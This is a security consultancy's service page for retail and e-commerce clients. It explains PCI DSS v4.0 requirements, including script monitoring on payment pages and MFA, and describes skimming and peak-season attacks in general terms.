Does PCI DSS v4.0 apply to us if we use a third-party payment provider?

Using a third-party payment provider reduces your PCI DSS scope but does not eliminate it. If your pages load JavaScript from external sources, if you handle cardholder data even temporarily, or if you have access to the payment environment, you remain in scope for relevant requirements. PCI DSS v4.0 Requirements 6.4.3 and 11.6.1 apply to any organization with JavaScript on a payment page, regardless of whether the form is hosted by a third party. We help you determine your actual scope and test the areas that remain your responsibility.

How do you test for payment form skimming attacks?

We review all JavaScript loaded on payment and checkout pages, identify third-party script sources, test for unauthorized script injection vectors, and assess whether your current monitoring would detect a skimming script. We also review your script inventory against PCI DSS v4.0 Requirements 6.4.3 and 11.6.1 to confirm your monitoring and integrity controls are in place.

What security testing does PCI DSS v4.0 require?

PCI DSS v4.0 Requirement 11.3 mandates annual penetration testing of the external network perimeter and all critical system components, plus testing after significant changes. For e-commerce environments, this typically means external network testing, web application testing of the payment flow, and internal testing of systems in the cardholder data environment. We map all findings to PCI DSS requirements in our deliverable so your QSA has a clear record.

By Sector

Retail and E-commerce

Retail and e-commerce security focuses on payment flows, customer data, and platform availability. Exactly the areas attackers target most, including during peak seasons. We protect customer data, payment systems, and online platforms while ensuring PCI-DSS compliance.

Retail

E-commerce security expertise

PCI DSS compliance

Payment security

Customer data protection

Sector Challenges We Address

PCI DSS compliance requirements

E-commerce platform vulnerabilities

Customer data protection

Payment fraud prevention

Supply chain security

Seasonal traffic and attack spikes

Specialized Services

PCI DSS Assessment

Comprehensive testing to meet payment card industry requirements and protect cardholder data

E-commerce Pentesting

Security assessment of online stores, payment flows, and customer account systems

Data Protection

Customer data security assessment and GDPR compliance support

Fraud Detection

Assessment of fraud prevention controls and payment security measures

PCI DSS v4.0: what changed

PCI DSS v4.0 introduced significant new requirements that directly affect e-commerce operations. If your compliance program was last reviewed under v3.2.1, it needs to be updated.

PCI DSS v3.2.1 retired 31 March 2024

PCI DSS version 3.2.1 was retired on 31 March 2024. Any organization that processes, stores, or transmits cardholder data is now required to demonstrate compliance with PCI DSS v4.0. The transition is not optional: operating under v3.2.1 controls is no longer a valid compliance posture.

MFA now mandatory for all CDE access

PCI DSS v4.0 Requirement 8.4 mandates multi-factor authentication for all access to the cardholder data environment. This closes a gap from v3.2.1 where MFA was only required for remote access. Local admin accounts and internal service accounts that bypassed MFA previously are now in scope.

Script monitoring for payment pages is mandatory

PCI DSS v4.0 Requirements 6.4.3 and 11.6.1 require organizations to maintain an authorized list of scripts on payment pages, monitor for unauthorized changes, and implement tamper-detection mechanisms. This directly targets Magecart-style skimming attacks. Organizations using hosted checkout forms are not automatically exempt from these requirements.

Attack patterns in retail

Retail faces predictable attack patterns that align with business cycles. Testing at the right time and monitoring the right vectors reduces exposure when it matters most.

Peak-season targeting

Attackers plan campaigns around retail peak periods because transaction volumes are highest, security teams are stretched, and the financial impact of downtime or fraud is greatest. Account takeover campaigns, credential stuffing, and inventory fraud all spike during major retail events. Testing before peak periods ensures your defenses are verified while pressure is lowest.

Payment form skimming

Magecart-style attacks inject malicious JavaScript into checkout pages to capture payment card data directly in the browser before it reaches the payment processor. The attack is invisible to the retailer and the customer. Scripts can persist undetected for months. PCI DSS v4.0 Requirements 6.4.3 and 11.6.1 specifically address this threat.

Frequently Asked Questions

Protect your e-commerce platform

Secure customer data and payment systems.